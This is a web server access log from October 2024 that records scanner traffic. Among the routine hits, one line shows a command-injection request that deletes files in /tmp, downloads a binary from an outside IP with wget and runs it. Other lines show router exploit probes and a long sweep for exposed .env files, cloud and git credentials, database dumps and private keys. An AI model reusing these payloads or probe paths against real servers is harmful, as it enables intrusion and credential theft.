198.235.24.200 - - [04/Oct/2024:00:30:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.200 - - [04/Oct/2024:00:30:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
197.58.247.78 - - [04/Oct/2024:00:31:37 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.80.139.104/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
93.174.93.12 - - [04/Oct/2024:00:32:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
149.50.103.48 - - [04/Oct/2024:00:32:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [04/Oct/2024:00:32:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
93.174.93.12 - - [04/Oct/2024:00:32:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
95.214.55.138 - - [04/Oct/2024:00:32:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
143.244.152.43 - - [04/Oct/2024:00:33:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
93.174.93.12 - - [04/Oct/2024:00:34:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
93.174.93.12 - - [04/Oct/2024:00:35:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
93.174.93.12 - - [04/Oct/2024:00:35:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
93.174.93.12 - - [04/Oct/2024:00:35:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
185.191.126.213 - - [04/Oct/2024:00:36:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [04/Oct/2024:00:36:30 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
95.214.55.138 - - [04/Oct/2024:00:36:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [04/Oct/2024:00:36:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0"
45.156.129.46 - - [04/Oct/2024:00:37:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
141.98.11.15 - - [04/Oct/2024:00:39:06 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.15 - - [04/Oct/2024:00:41:05 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
8.211.41.141 - - [04/Oct/2024:00:41:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
45.15.17.67 - - [04/Oct/2024:00:42:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
45.15.17.67 - - [04/Oct/2024:00:42:12 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
141.98.11.79 - - [04/Oct/2024:00:43:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.15 - - [04/Oct/2024:00:43:17 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.15 - - [04/Oct/2024:00:44:20 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.15 - - [04/Oct/2024:00:46:46 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.224.128.59 - - [04/Oct/2024:00:47:20 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
149.50.103.48 - - [04/Oct/2024:00:48:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [04/Oct/2024:00:48:37 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
154.213.187.244 - - [04/Oct/2024:00:50:56 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
165.154.182.53 - - [04/Oct/2024:00:51:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1_1) AppleWebKit/601.46 (KHTML, like Gecko) Chrome/100.0.2156 Safari/537.36"
165.154.182.53 - - [04/Oct/2024:00:51:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.154.182.53 - - [04/Oct/2024:00:51:40 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
165.154.182.53 - - [04/Oct/2024:00:51:40 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
141.98.11.15 - - [04/Oct/2024:00:51:42 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.15 - - [04/Oct/2024:00:52:02 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
141.98.11.79 - - [04/Oct/2024:00:54:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.209.98.9 - - [04/Oct/2024:00:54:59 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
185.191.126.213 - - [04/Oct/2024:00:56:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /1.sql HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /backup.sql HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /database.sql HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /data.sql HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /db_backup.sql HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /dbdump.sql HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /db.sql HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /dump.sql HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /212.91.246.82.sql HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /212.91.246.82_db.sql HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /localhost.sql HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /mysqldump.sql HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /mysql.sql HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /site.sql HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /sql.sql HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /temp.sql HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /translate.sql HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /users.sql HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /www.sql HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /wp-content/uploads/dump.sql HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:56:58 +0200] "GET /wp-content/mysql.sql HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:23 +0200] "GET /sa.bak HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /wwwroot.bak HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /backup.bak HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /database.bak HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /data.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /db_backup.bak HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /dbdump.bak HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /db.bak HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /dump.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /212.91.246.82.bak HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /212.91.246.82_db.bak HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /localhost.bak HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /mysqldump.bak HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /mysql.bak HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /site.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /sql.bak HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /temp.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /translate.bak HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /users.bak HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /www.bak HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /wp-content/uploads/dump.bak HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:24 +0200] "GET /wp-content/mysql.bak HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:51 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:52 +0200] "GET /public/config.js HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:52 +0200] "GET /config.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:56 +0200] "GET /.git-credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.dev HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.dev.local HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.development.local HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.prod.local HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.production.local HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.stage HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.live HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.backup HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.www HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env_1 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env_sample HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:57 +0200] "GET /.env.246 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:58 +0200] "GET /.env.212.91 HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:57:58 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
185.191.126.213 - - [04/Oct/2024:00:58:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
8.209.98.9 - - [04/Oct/2024:00:58:24 +0200] "GET /auth.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:26 +0200] "GET /credentials.json HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:26 +0200] "GET /assets/credentials.json HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /manage.py HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /settings.py HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /app/settings.py HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /django/settings.py HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /settings/settings.py HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:28 +0200] "GET /web/settings/settings.py HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:35 +0200] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:37 +0200] "GET /assets/other/service-account-credentials.json HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:37 +0200] "GET /service-account-credentials.json HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
35.203.211.178 - - [04/Oct/2024:00:58:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
8.209.98.9 - - [04/Oct/2024:00:58:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:40 +0200] "GET /google-api-private-key.json HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
8.209.98.9 - - [04/Oct/2024:00:58:40 +0200] "GET /app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
